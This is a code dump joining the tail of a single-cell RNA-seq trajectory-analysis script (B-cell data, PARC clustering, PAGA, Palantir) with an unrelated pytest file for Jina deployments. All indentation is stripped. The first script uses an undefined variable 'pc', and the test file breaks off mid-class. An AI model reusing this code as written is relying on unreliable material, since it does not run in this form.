embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'])  # pc is only defined in the commented-out PCA block above
print('tsne input size', adata_counts.obsm['X_pca'].shape)
# embedding = umap.UMAP().fit_transform(adata_counts.obsm['X_pca'])
idx = np.random.randint(len(labels), size=len(labels))
print('end tsne')
knn_hnsw, ci_list = sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx)
draw_trajectory_gams(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters, sub_terminal_clusters=p1.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
plt.show()
draw_trajectory_dimred(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters,
title_str='Hitting times: Markov Simulation on biased edges', ncomp=ncomps)
plt.show()
num_group = len(set(true_label))
line = np.linspace(0, 1, num_group)
f, (ax1, ax3) = plt.subplots(1, 2, sharey=True)
for color, group in zip(line, set(true_label)):
where = np.where(np.asarray(true_label) == group)[0]
ax1.scatter(embedding[where, 0], embedding[where, 1], label=group,
c=np.asarray(plt.cm.jet(color)).reshape(-1, 4))
ax1.legend(fontsize=6)
ax1.set_title('true labels')
ax3.set_title("Markov Sim PT ncomps:" + str(pc.shape[1]) + '. knn:' + str(knn))
ax3.scatter(embedding[:, 0], embedding[:, 1], c=sc_pt_markov, cmap='viridis_r')
plt.show()
#draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, p0.full_graph_shortpath, idx, adata_counts.obsm['X_pca'][:, 0:ncomps])
plt.show()
def main_Bcell(ncomps, knn, random_seed):
print('ncomp, knn, random seed', ncomps, knn, random_seed)
#https://github.com/STATegraData/STATegraData
def run_zheng(adata, min_counts=3, n_top_genes=500,do_HVG=True):
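# Zheng17-style preprocessing: filter low-count genes, total-count normalise,
# optionally select highly variable genes after log1p, renormalise per cell,
# log-transform only if HVG selection was skipped, then scale genes (capped at 10).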
sc.pp.filter_genes(adata, min_counts=min_counts)
# sc.pp.filter_genes(adata, min_cells=3)# only consider genes with more than 1 count
'''
sc.pp.normalize_per_cell( # normalize with total UMI count per cell
adata, key_n_counts='n_counts_all')
'''
sc.pp.normalize_total(adata, target_sum=1e4)
if do_HVG == True:
sc.pp.log1p(adata)
'''
filter_result = sc.pp.filter_genes_dispersion( # select highly-variable genes
adata.X, flavor='cell_ranger', n_top_genes=n_top_genes, log=False )
adata = adata[:, filter_result.gene_subset] # subset the genes
'''
sc.pp.highly_variable_genes(adata, n_top_genes=n_top_genes, min_mean=0.0125, max_mean=3, min_disp=0.5)
print('len hvg ',sum(adata.var.highly_variable))
adata = adata[:, adata.var.highly_variable]
sc.pp.normalize_per_cell(adata) # renormalize after filtering
#if do_log: sc.pp.log1p(adata) # log transform: adata.X = log(adata.X + 1)
if do_HVG==False: sc.pp.log1p(adata)
sc.pp.scale(adata, max_value=10) # scale to unit variance and shift to zero mean
return adata
def run_paga_func_Bcell(adata_counts1, ncomps, knn, embedding):
# print('npwhere',np.where(np.asarray(adata_counts.obs['group_id']) == '0')[0][0])
adata_counts = adata_counts1.copy()
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
adata_counts.uns['iroot'] = 33 # np.where(np.asarray(adata_counts.obs['group_id']) == '0')[0][0]
sc.pp.neighbors(adata_counts, n_neighbors=knn, n_pcs=ncomps) # 4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data') # force-directed layout
start_dfmap = time.time()
sc.tl.diffmap(adata_counts, n_comps=ncomps)
print('time taken to get diffmap given knn', time.time() - start_dfmap)
sc.pp.neighbors(adata_counts, n_neighbors=knn, use_rep='X_diffmap') # 4
sc.tl.draw_graph(adata_counts)
sc.pl.draw_graph(adata_counts, color='group_id', legend_loc='on data')
sc.tl.leiden(adata_counts, resolution=1.0)
sc.tl.paga(adata_counts, groups='leiden')
# sc.pl.paga(adata_counts, color=['louvain','group_id'])
sc.tl.dpt(adata_counts, n_dcs=ncomps)
sc.pl.paga(adata_counts, color=['leiden', 'group_id', 'dpt_pseudotime'],
title=['leiden (knn:' + str(knn) + ' ncomps:' + str(ncomps) + ')',
'group_id (ncomps:' + str(ncomps) + ')', 'pseudotime (ncomps:' + str(ncomps) + ')'])
sc.pl.draw_graph(adata_counts, color='dpt_pseudotime', legend_loc='on data')
print('dpt format', adata_counts.obs['dpt_pseudotime'])
plt.scatter(embedding[:, 0], embedding[:, 1], c=adata_counts.obs['dpt_pseudotime'].values, cmap='viridis')
plt.title('PAGA DPT')
plt.show()
def run_palantir_func_Bcell(ad1, ncomps, knn, tsne_X, true_label):
ad = ad1.copy()
tsne = pd.DataFrame(tsne_X, index=ad.obs_names, columns=['x', 'y'])
norm_df_pal = pd.DataFrame(ad.X)
new = ['c' + str(i) for i in norm_df_pal.index]
norm_df_pal.columns = [i for i in ad.var_names]
# print('norm df', norm_df_pal)
norm_df_pal.index = new
pca_projections, _ = palantir.utils.run_pca(norm_df_pal, n_components=ncomps)
sc.tl.pca(ad, svd_solver='arpack')
dm_res = palantir.utils.run_diffusion_maps(pca_projections, n_components=ncomps, knn=knn)
ms_data = palantir.utils.determine_multiscale_space(dm_res) # n_eigs is determined using eigengap
print('ms data shape: determined using eigengap', ms_data.shape)
# tsne = pd.DataFrame(tsnem)#palantir.utils.run_tsne(ms_data)
tsne.index = new
# print(type(tsne))
str_true_label = pd.Series(true_label, index=norm_df_pal.index)
palantir.plot.plot_cell_clusters(tsne, str_true_label)
start_cell = 'c42' # '#C108 for M12 connected' #M8n1000d1000 start - c107 #c1001 for bifurc n2000d1000 #disconnected n1000 c108, "C1 for M10 connected" # c10 for bifurcating_m4_n2000d1000
pr_res = palantir.core.run_palantir(ms_data, early_cell=start_cell, num_waypoints=1200, knn=knn)
palantir.plot.plot_palantir_results(pr_res, tsne, n_knn=knn, n_comps=ncomps)
imp_df = palantir.utils.run_magic_imputation(norm_df_pal, dm_res)
Bcell_marker_gene_list = ['Igll1','Myc', 'Ldha', 'Foxo1', 'Lig4']#, 'Slc7a5']#,'Slc7a5']#,'Sp7','Zfp629']
gene_trends = palantir.presults.compute_gene_trends(pr_res, imp_df.loc[:, Bcell_marker_gene_list])
palantir.plot.plot_gene_trends(gene_trends)
plt.show()
def find_time(s):
start = s.find("Ik") + len("Ik")
end = s.find("h")
return int(s[start:end])
def find_cellID(s):
start = s.find("h") + len("h")
end = s.find("_")
return s[start:end]
diff = pd.read_excel('/home/shobi/Downloads/journal_bgenes.xlsx', sep='\t')
is_diff = diff['CONSENSUS_DE']==1
diff = diff[is_diff]
print('shape dff', diff.shape)
diff_list = diff['MGI_Symbol'].values.tolist()
diff_list = [i for i in diff_list if isinstance(i, str) ]
print('len diff list', len(diff_list))
Bcell = pd.read_csv('/home/shobi/Trajectory/Datasets/Bcell/genes_count_table.txt', sep='\t')
gene_name = pd.read_csv('/home/shobi/Trajectory/Datasets/Bcell/genes_attr_table.txt', sep='\t')
Bcell_columns = [i for i in Bcell.columns]
adata_counts = sc.AnnData(Bcell.values[:, 1:].T)
Bcell_columns.remove('tracking_id')
print(gene_name.shape, gene_name.columns)
Bcell['gene_short_name'] = gene_name['gene_short_name']
adata_counts.var_names = gene_name['gene_short_name']
adata_counts.obs['TimeCellID'] = Bcell_columns
time_list = [find_time(s) for s in Bcell_columns]
#for ii, jj in enumerate(time_list):
#print(ii, jj)
print('time list set', set(time_list))
adata_counts.obs['TimeStamp'] =[str(tt) for tt in time_list]
# for i in Bcell_columns:
# print(i)
# adata_counts.var_names_make_unique()
ID_list = [find_cellID(s) for s in Bcell_columns]
adata_counts.obs['group_id'] = [str(i) for i in time_list]
ID_dict = {}
color_dict = {}
for j, i in enumerate(list(set(ID_list))):
ID_dict.update({i: j})
for j, i in enumerate(list(set(time_list))):
color_dict.update({i: j})
print('shape of raw data', adata_counts.shape)
# sc.pp.filter_genes(adata_counts, min_counts=3)
adata_counts_unfiltered = adata_counts.copy()
Bcell_marker_gene_list = ['Myc', 'Igll1', 'Slc7a5', 'Ldha', 'Foxo1', 'Lig4']
small_large_gene_list = ['Kit','Pcna','Ptprc','Il2ra','Vpreb1','Cd24a','Igll1','Cd79a','Cd79b','Mme', 'Spn']
list_var_names = [s for s in adata_counts_unfiltered.var_names]
matching = [s for s in list_var_names if "IgG" in s]
print('matching', matching)
for gene_name in Bcell_marker_gene_list:
print('gene name', gene_name)
loc_gata = np.where(np.asarray(adata_counts_unfiltered.var_names) == gene_name)[0][0]
for gene_name in small_large_gene_list:
print('looking at small-big list')
print('gene name', gene_name)
loc_gata = np.where(np.asarray(adata_counts_unfiltered.var_names) == gene_name)[0][0]
#diff_list = [i for i in diff_list if i in list_var_names] #based on paper STable1 https://journals.plos.org/plosbiology/article?id=10.1371/journal.pbio.2006506#pbio.2006506.s007
#adata_counts = adata_counts[:,diff_list] #if using these, then set do-HVG to False
print('adata counts difflisted', adata_counts.shape)
adata_counts = run_zheng(adata_counts, n_top_genes=5000, min_counts=30, do_HVG=True) #5000 for better ordering
print('adata counts shape', adata_counts.shape)
# sc.pp.recipe_zheng17(adata_counts)
# (ncomp=50, knn=20 gives nice results. use 10PCs for visualizing)
marker_genes = {"small": [ 'Rag2','Rag1','Pcna','Myc','Ccnd2','Cdkn1a','Smad4','Smad3', 'Cdkn2a'],#B220 = Ptprc, PCNA negative for non cycling
"large": ['Ighm','Kit', 'Ptprc','Cd19','Il2ra','Vpreb1','Cd24a','Igll1','Cd79a','Cd79b'],
"Pre-B2": ['Mme', 'Spn']} #'Cd19','Cxcl13',,'Kit'
print('make the p0 matrix plot')
mplot_adata = adata_counts_unfiltered.copy()
mplot_adata = run_zheng(mplot_adata, n_top_genes=25000, min_counts=1,do_HVG = False)
#mplot_adata.X[mplot_adata.X>10] =10
#mplot_adata.X[mplot_adata.X< -1] = -1
sc.pl.matrixplot(mplot_adata, marker_genes, groupby='TimeStamp')
sc.tl.pca(adata_counts, svd_solver='arpack', n_comps=ncomps)
#sc.pl.pca_variance_ratio(adata_counts, log=True)
jet = cm.get_cmap('viridis', len(set(time_list)))
cmap_ = jet(range(len(set(time_list))))
jet2 = cm.get_cmap('jet', len(set(ID_list)))
cmap2_ = jet2(range(len(set(ID_list))))
# color_dict = {"0": [0], "2": [1], "6": [2], "12": [3], "18": [4], "24": [5]}
#sc.pl.heatmap(mplot_adata, var_names = small_large_gene_list,groupby = 'TimeStamp', dendrogram = True)
embedding = umap.UMAP(random_state=42, n_neighbors=15, init='random').fit_transform(
adata_counts.obsm['X_pca'][:, 0:5])
f, (ax1, ax2, ax3, ax4) = plt.subplots(1, 4, sharey=True)
for i in list(set(time_list)):
loc = np.where(np.asarray(time_list) == i)[0]
ax4.scatter(embedding[loc, 0], embedding[loc, 1], c=cmap_[color_dict[i]], alpha=1, label=str(i))
if i ==0:
for xx in range(len(loc)):
poss = loc[xx]
ax4.text(embedding[poss,0],embedding[poss,1], 'c'+str(xx))
ax4.legend()
ax1.scatter(embedding[:, 0], embedding[:, 1], c=mplot_adata[:,'Pcna'].X.flatten(), alpha=1)
ax1.set_title('Pcna, cycling')
ax2.scatter(embedding[:, 0], embedding[:, 1], c=mplot_adata[:,'Vpreb1'].X.flatten(), alpha=1)
ax2.set_title('Vpreb1')
ax3.scatter(embedding[:, 0], embedding[:, 1], c=mplot_adata[:,'Cd24a'].X.flatten(), alpha=1)
ax3.set_title('Cd24a')
#ax2.text(embedding[i, 0], embedding[i, 1], str(i))
'''
for i, j in enumerate(list(set(ID_list))):
loc = np.where(np.asarray(ID_list) == j)
if 'r'in j: ax2.scatter(embedding[loc, 0], embedding[loc, 1], c=cmap2_[i], alpha=1, label=str(j), edgecolors = 'black' )
else: ax2.scatter(embedding[loc, 0], embedding[loc, 1], c=cmap2_[i], alpha=1, label=str(j))
'''
# plt.show()
true_label = time_list
# run_paga_func_Bcell(adata_counts, ncomps, knn, embedding)
#run_palantir_func_Bcell(adata_counts, ncomps, knn, embedding, true_label)
print('input has shape', adata_counts.obsm['X_pca'].shape)
input_via = adata_counts.obsm['X_pca'][:, 0:ncomps]
p0 = PARC(input_via, true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.3, dataset='bcell',
pseudotime=True, path="/home/shobi/Trajectory/Datasets/" + 'bcell' + "/",
root_user=42, preserve_disconnected=True, random_seed=random_seed, do_magic_bool=True) # *.4#root_user = 34
p0.run_PARC()
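# p0 is the coarse clustering pass (too_big_factor=0.3); its labels and terminal
# clusters seed the refined p1 run below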
super_labels = p0.labels
'''
umap_init_ = p0.graph_node_pos
umap_init_ = np.asarray(umap_init_)
umap_init = np.random.rand(len(super_labels),2)
for clus_i in range(umap_init_.shape[0]):
loc_clus_i = np.where(np.asarray(super_labels) == clus_i)[0]
umap_init[loc_clus_i,0]=umap_init_[clus_i,0]
umap_init[loc_clus_i, 1] = umap_init_[clus_i, 1]
'''
p = hnswlib.Index(space='l2', dim=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[1])
p.init_index(max_elements=adata_counts.obsm['X_pca'][:, 0:ncomps].shape[0], ef_construction=100, M=16)
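# hnswlib: M and ef_construction trade index build time/memory for graph quality;
# set_ef below fixes the query-time candidate-list size used by knn_query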
p.add_items(adata_counts.obsm['X_pca'][:, 0:ncomps])
p.set_ef(30)
tsi_list = []  # find the single cell nearest to the average location of each terminal cluster in PCA space
for tsi in p0.terminal_clusters:
loc_i = np.where(np.asarray(p0.labels) == tsi)[0]
val_pt = [p0.single_cell_pt_markov[i] for i in loc_i]
th_pt = np.percentile(val_pt, 50) # 50
loc_i = [loc_i[i] for i in range(len(val_pt)) if val_pt[i] >= th_pt]
temp = np.mean(adata_counts.obsm['X_pca'][:, 0:ncomps][loc_i], axis=0)
labelsq, distances = p.knn_query(temp, k=1)
print(labelsq[0])
tsi_list.append(labelsq[0][0])
p1 = PARC(adata_counts.obsm['X_pca'][:, 0:ncomps], true_label, jac_std_global=0.15, dist_std_local=1, knn=knn,
too_big_factor=0.05,
path="/home/shobi/Trajectory/Datasets/" + "bcell/", pseudotime=True,
super_cluster_labels=super_labels, super_node_degree_list=p0.node_degree_list,
super_terminal_cells=tsi_list, root_user=42,
x_lazy=0.99, alpha_teleport=0.99, preserve_disconnected=True, dataset='bcell',
super_terminal_clusters=p0.terminal_clusters, random_seed=random_seed)
p1.run_PARC()
labels = p1.labels
super_edges = p0.edgelist
# plot gene expression vs. pseudotime
Bcell_marker_gene_list = ['Igll1']#, 'Myc', 'Slc7a5', 'Ldha', 'Foxo1', 'Lig4','Sp7','Zfp629'] #irf4 down-up
df_ = pd.DataFrame(adata_counts_unfiltered.X)
df_.columns = [i for i in adata_counts_unfiltered.var_names]
df_magic = p0.do_magic(df_, magic_steps=3, gene_list=Bcell_marker_gene_list)
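# MAGIC imputation (3 diffusion steps here) denoises the raw expression so the
# per-gene pseudotime trends plotted below are smoother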
for gene_name in Bcell_marker_gene_list:
#loc_gata = np.where(np.asarray(adata_counts_unfiltered.var_names) == gene_name)[0][0]
subset_ = df_magic[gene_name].values
p1.get_gene_expression(subset_, title_gene=gene_name + ' (VIA MAGIC)')
#magic_ad = adata_counts_unfiltered.X[:, loc_gata]
#p1.get_gene_expression(magic_ad, gene_name)
n_downsample = 100
if len(labels) > n_downsample:
# idx = np.random.randint(len(labels), size=900)
np.random.seed(2357)
#idx = np.random.choice(a=np.arange(0, len(labels)), size=len(labels), replace=False, p=None)
idx = np.arange(0, len(labels))
super_labels = np.asarray(super_labels)[idx]
labels = list(np.asarray(labels)[idx])
true_label = list((np.asarray(true_label)[idx]))
sc_pt_markov = list(np.asarray(p1.single_cell_pt_markov)[idx])
#embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][idx, :])
graph_embedding = p0.knngraph_visual(input_via[idx, 0:5], knn_umap =10, downsampled=True)
embedding_hnsw = p0.run_umap_hnsw(input_via[idx, 0:5], graph_embedding)
#embedding = embedding_hnsw
#loc0 = np.where(np.asarray(true_label)==0)[0]
#for item in loc0:
#print(item, 'at', embedding[item,:])
print('tsne downsampled size', embedding.shape)
else:
# embedding = TSNE().fit_transform(adata_counts.obsm['X_pca'][:,0:5]) # (adata_counts.obsm['X_pca'])
print('tsne input size', adata_counts.obsm['X_pca'].shape)
# embedding = umap.UMAP().fit_transform(adata_counts.obsm['X_pca'])
idx = np.arange(0, len(labels)) # np.random.randint(len(labels), size=len(labels))
sc_pt_markov = p1.single_cell_pt_markov
# embedding = umap.UMAP(random_state=42, n_neighbors=15, init=umap_init).fit_transform( adata_counts.obsm['X_pca'][:, 0:5])
knn_hnsw, ci_list = sc_loc_ofsuperCluster_embeddedspace(embedding, p0, p1, idx)
draw_trajectory_gams(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p1.revised_super_terminal_clusters,
sub_terminal_clusters=p1.terminal_clusters,
title_str='Markov Hitting Times (Gams)', ncomp=ncomps)
plt.show()
'''
draw_trajectory_dimred(embedding, ci_list, labels, super_labels, super_edges,
p1.x_lazy, p1.alpha_teleport, sc_pt_markov, true_label, knn=p0.knn,
final_super_terminal=p0.terminal_clusters,
title_str='Markov Hitting Times (polyfit)', ncomp=ncomps)
plt.show()
'''
#draw_sc_evolution_trajectory_dijkstra(p1, embedding, knn_hnsw, p0.full_graph_shortpath, idx, adata_counts.obsm['X_pca'][:, 0:ncomps])
plt.show()
def main():
dataset = 'Human'#,'Toy'#,'Bcell' # 'Toy'
if dataset == 'Human':
main_Human(ncomps=10, knn=30, p0_random_seed=12, run_palantir_func=False)
elif dataset == 'Bcell':
main_Bcell(ncomps=100, knn=20, random_seed=4 ) #0 is good
else:
main_Toy(ncomps =180, knn=30, random_seed = 42)
if __name__ == '__main__':
main()
|
test_deployments.py
|
import json
import os
from multiprocessing import Process
import pytest
from jina.clients.request import request_generator
from jina.enums import PollingType
from jina.parsers import set_gateway_parser
from jina.parsers import set_deployment_parser
from jina.orchestrate.deployments import Deployment
from jina import (
Document,
DocumentArray,
Executor,
__default_executor__,
__default_host__,
requests,
)
from jina.serve.networking import GrpcConnectionPool
from tests.unit.test_helper import MyDummyExecutor
cur_dir = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture(scope='function')
def pod_args():
args = [
'--name',
'test',
'--replicas',
'2',
'--host',
__default_host__,
]
return set_deployment_parser().parse_args(args)
@pytest.fixture
def graph_description():
return '{"start-gateway": ["pod0"], "pod0": ["end-gateway"]}'
@pytest.fixture(scope='function')
def pod_args_singleton():
args = [
'--name',
'test2',
'--uses-before',
__default_executor__,
'--replicas',
'1',
'--host',
__default_host__,
]
return set_deployment_parser().parse_args(args)
def test_name(pod_args):
with Deployment(pod_args) as pod:
assert pod.name == 'test'
def test_host(pod_args):
with Deployment(pod_args) as pod:
assert pod.host == __default_host__
assert pod.head_host == __default_host__
def test_is_ready(pod_args):
with Deployment(pod_args) as pod:
assert pod.is_ready is True
def test_equal(pod_args, pod_args_singleton):
pod1 = Deployment(pod_args)
pod2 = Deployment(pod_args)
assert pod1 == pod2
pod1.close()
pod2.close()
# test not equal
pod1 = Deployment(pod_args)
pod2 = Deployment(pod_args_singleton)
assert pod1 != pod2
pod1.close()
pod2.close()
class ChildDummyExecutor(MyDummyExecutor):
pass
class ChildDummyExecutor2(MyDummyExecutor):
pass
def test_uses_before_after(pod_args):
pod_args.replicas = 1
pod_args.uses_before = 'MyDummyExecutor'
pod_args.uses_after = 'ChildDummyExecutor2'
pod_args.uses = 'ChildDummyExecutor'
with Deployment(pod_args) as pod:
assert (
pod.head_args.uses_before_address
== f'{pod.uses_before_args.host}:{pod.uses_before_args.port_in}'
)
assert (
pod.head_args.uses_after_address
== f'{pod.uses_after_args.host}:{pod.uses_after_args.port_in}'
)
assert pod.num_pods == 4
def test_mermaid_str_no_error(pod_args):
pod_args.replicas = 3
pod_args.uses_before = 'MyDummyExecutor'
pod_args.uses_after = 'ChildDummyExecutor2'
pod_args.uses = 'ChildDummyExecutor'
pod = Deployment(pod_args)
print(pod._mermaid_str)
@pytest.mark.slow
@pytest.mark.parametrize('replicas', [1, 2, 4])
def test_pod_context_replicas(replicas):
args_list = ['--replicas', str(replicas)]
args = set_deployment_parser().parse_args(args_list)
with Deployment(args) as bp:
if replicas == 1:
assert bp.num_pods == 2
else:
# count head
assert bp.num_pods == replicas + 1
Deployment(args).start().close()
@pytest.mark.slow
@pytest.mark.parametrize('shards', [1, 2, 4])
def test_pod_context_shards_replicas(shards):
args_list = ['--replicas', str(3)]
args_list.extend(['--shards', str(shards)])
args = set_deployment_parser().parse_args(args_list)
with Deployment(args) as bp:
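# one head pod plus shards * replicas worker pods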
assert bp.num_pods == shards * 3 + 1
Deployment(args).start().close()
class AppendNameExecutor(Executor):
def __init__(self, runtime_args, *args, **kwargs):
super().__init__(*args, **kwargs)
self.name = runtime_args['name']
@requests
def foo(self, docs: DocumentArray, **kwargs):
docs.append(Document(text=str(self.name)))
return docs
@pytest.mark.slow
def test_pod_activates_replicas():
args_list = ['--replicas', '3']
args = set_deployment_parser().parse_args(args_list)
args.uses = 'AppendNameExecutor'
with Deployment(args) as pod:
assert pod.num_pods == 4
response_texts = set()
# replicas are used in a round-robin fashion, so sending 3 requests should hit each replica once
for _ in range(3):
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(),
f'{pod.head_args.host}:{pod.head_args.port_in}',
)
response_texts.update(response.response.docs.texts)
assert 4 == len(response_texts)
assert all(text in response_texts for text in ['0', '1', '2', 'client'])
Deployment(args).start().close()
class AppendParamExecutor(Executor):
def __init__(self, param, *args, **kwargs):
super().__init__(*args, **kwargs)
self.param = param
@requests
def foo(self, docs: DocumentArray, **kwargs):
docs.append(Document(text=str(self.param)))
return docs
@pytest.mark.slow
@pytest.mark.parametrize('shards', [1, 2])
def test_pod_rolling_update(shards):
args_list = ['--replicas', '7']
args_list.extend(['--shards', str(shards)])
args = set_deployment_parser().parse_args(args_list)
args.uses = 'AppendParamExecutor'
args.uses_with = {'param': 10}
with Deployment(args) as pod:
async def run_async_test():
response_texts = await _send_requests(pod)
assert 2 == len(response_texts)
assert all(text in response_texts for text in ['10', 'client'])
await pod.rolling_update(uses_with={'param': 20})
response_texts = await _send_requests(pod)
assert 2 == len(response_texts)
assert all(text in response_texts for text in ['20', 'client'])
assert '10' not in response_texts
# run_async_test is a coroutine function, so the child process has to drive it with an
# event loop; otherwise the assertions inside it would never actually execute
import asyncio
p = Process(target=lambda: asyncio.run(run_async_test()))
p.start()
p.join()
assert p.exitcode == 0
Deployment(args).start().close()
async def _send_requests(pod):
response_texts = set()
for _ in range(3):
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(),
f'{pod.head_args.host}:{pod.head_args.port_in}',
)
response_texts.update(response.response.docs.texts)
return response_texts
class AppendShardExecutor(Executor):
def __init__(self, runtime_args, *args, **kwargs):
super().__init__(*args, **kwargs)
self.shard_id = runtime_args['shard_id']
@requests
def foo(self, docs: DocumentArray, **kwargs):
docs.append(Document(text=str(self.shard_id)))
return docs
def test_pod_naming_with_shards():
args = set_deployment_parser().parse_args(
[
'--name',
'pod',
'--shards',
'2',
'--replicas',
'3',
]
)
with Deployment(args) as pod:
assert pod.head_pod.name == 'pod/head'
assert pod.shards[0].args[0].name == 'pod/shard-0/rep-0'
assert pod.shards[0].args[1].name == 'pod/shard-0/rep-1'
assert pod.shards[0].args[2].name == 'pod/shard-0/rep-2'
assert pod.shards[1].args[0].name == 'pod/shard-1/rep-0'
assert pod.shards[1].args[1].name == 'pod/shard-1/rep-1'
assert pod.shards[1].args[2].name == 'pod/shard-1/rep-2'
@pytest.mark.slow
def test_pod_activates_shards():
args_list = ['--replicas', '3']
args_list.extend(['--shards', '3'])
args = set_deployment_parser().parse_args(args_list)
args.uses = 'AppendShardExecutor'
args.polling = PollingType.ALL
with Deployment(args) as pod:
assert pod.num_pods == 3 * 3 + 1
response_texts = set()
# with ALL polling a single request is broadcast to every shard, so each shard appends its id once
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(),
f'{pod.head_args.host}:{pod.head_args.port_in}',
)
response_texts.update(response.response.docs.texts)
assert 4 == len(response.response.docs.texts)
assert 4 == len(response_texts)
assert all(text in response_texts for text in ['0', '1', '2', 'client'])
Deployment(args).start().close()
@pytest.mark.slow
@pytest.mark.skipif(
'GITHUB_WORKFLOW' in os.environ,
reason='for unknown reasons, this test is flaky on GitHub Actions, '
'but locally it SHOULD work fine',
)
@pytest.mark.parametrize(
'protocol, runtime_cls',
[
('grpc', 'GRPCGatewayRuntime'),
],
)
def test_gateway_pod(protocol, runtime_cls, graph_description):
args = set_gateway_parser().parse_args(
[
'--graph-description',
graph_description,
'--deployments-addresses',
'{"pod0": ["0.0.0.0:1234"]}',
'--protocol',
protocol,
]
)
with Deployment(args) as p:
assert len(p.all_args) == 1
assert p.all_args[0].runtime_cls == runtime_cls
Deployment(args).start().close()
def test_pod_naming_with_replica():
args = set_deployment_parser().parse_args(['--name', 'pod', '--replicas', '2'])
with Deployment(args) as bp:
assert bp.head_pod.name == 'pod/head'
assert bp.shards[0]._pods[0].name == 'pod/rep-0'
assert bp.shards[0]._pods[1].name == 'pod/rep-1'
def test_pod_args_remove_uses_ba():
args = set_deployment_parser().parse_args([])
with Deployment(args) as p:
assert p.num_pods == 2
args = set_deployment_parser().parse_args(
['--uses-before', __default_executor__, '--uses-after', __default_executor__]
)
with Deployment(args) as p:
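# the default uses_before/uses_after executors are stripped, so this is still just head + one worker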
assert p.num_pods == 2
args = set_deployment_parser().parse_args(
[
'--uses-before',
__default_executor__,
'--uses-after',
__default_executor__,
'--replicas',
'2',
]
)
with Deployment(args) as p:
assert p.num_pods == 3
@pytest.mark.parametrize('replicas', [1])
@pytest.mark.parametrize(
'upload_files',
[[os.path.join(cur_dir, __file__), os.path.join(cur_dir, '__init__.py')]],
)
@pytest.mark.parametrize(
'uses, uses_before, uses_after, py_modules, expected',
[
(
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
'',
'',
[
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, '__init__.py'),
],
[
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, __file__),
os.path.join(cur_dir, '__init__.py'),
],
),
(
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
[
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
],
[
os.path.join(cur_dir, '../../yaml/dummy_ext_exec.yml'),
os.path.join(cur_dir, '../../yaml/dummy_exec.py'),
os.path.join(cur_dir, __file__),
os.path.join(cur_dir, '__init__.py'),
],
),
(
'non_existing1.yml',
'non_existing3.yml',
'non_existing4.yml',
['non_existing1.py', 'non_existing2.py'],
[os.path.join(cur_dir, __file__), os.path.join(cur_dir, '__init__.py')],
),
],
)
def test_pod_upload_files(
replicas,
upload_files,
uses,
uses_before,
uses_after,
py_modules,
expected,
):
args = set_deployment_parser().parse_args(
[
'--uses',
uses,
'--uses-before',
uses_before,
'--uses-after',
uses_after,
'--py-modules',
*py_modules,
'--upload-files',
*upload_files,
'--replicas',
str(replicas),
]
)
pod = Deployment(args)
for k, v in pod.pod_args.items():
if k in ['head', 'tail']:
if v:
pass
# assert sorted(v.upload_files) == sorted(expected)
elif v is not None and k == 'pods':
for shard_id in v:
for pod in v[shard_id]:
print(sorted(pod.upload_files))
print(sorted(expected))
assert sorted(pod.upload_files) == sorted(expected)
class DynamicPollingExecutor(Executor):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@requests(on='/any')
def any(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@requests(on='/all')
def all(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@requests(on='/no_polling')
def no_polling(self, docs: DocumentArray, **kwargs):
docs.append(Document(text='added'))
return docs
@pytest.mark.parametrize('polling', ['any', 'all'])
def test_dynamic_polling_with_config(polling):
endpoint_polling = {'/any': PollingType.ANY, '/all': PollingType.ALL, '*': polling}
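# explicit endpoint entries override the '*' fallback, which applies to any endpoint
# without its own entry (e.g. '/no_polling' below)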
args = set_deployment_parser().parse_args(
[
'--uses',
'DynamicPollingExecutor',
'--shards',
str(2),
'--polling',
json.dumps(endpoint_polling),
]
)
pod = Deployment(args)
with pod:
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/all'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/all',
)
assert len(response.docs) == 1 + 2 # 1 source doc + 2 docs added by each shard
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/any'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/any',
)
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
response = GrpcConnectionPool.send_request_sync(
_create_test_data_message(endpoint='/no_polling'),
f'{pod.head_args.host}:{pod.head_args.port_in}',
endpoint='/no_polling',
)
if polling == 'any':
assert (
len(response.docs) == 1 + 1
) # 1 source doc + 1 doc added by the one shard
else:
assert (
len(response.docs) == 1 + 2
) # 1 source doc + 1 doc added by the two shards
class DynamicPollingExecutorDefaultNames(Executor):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@requests(on='/index')
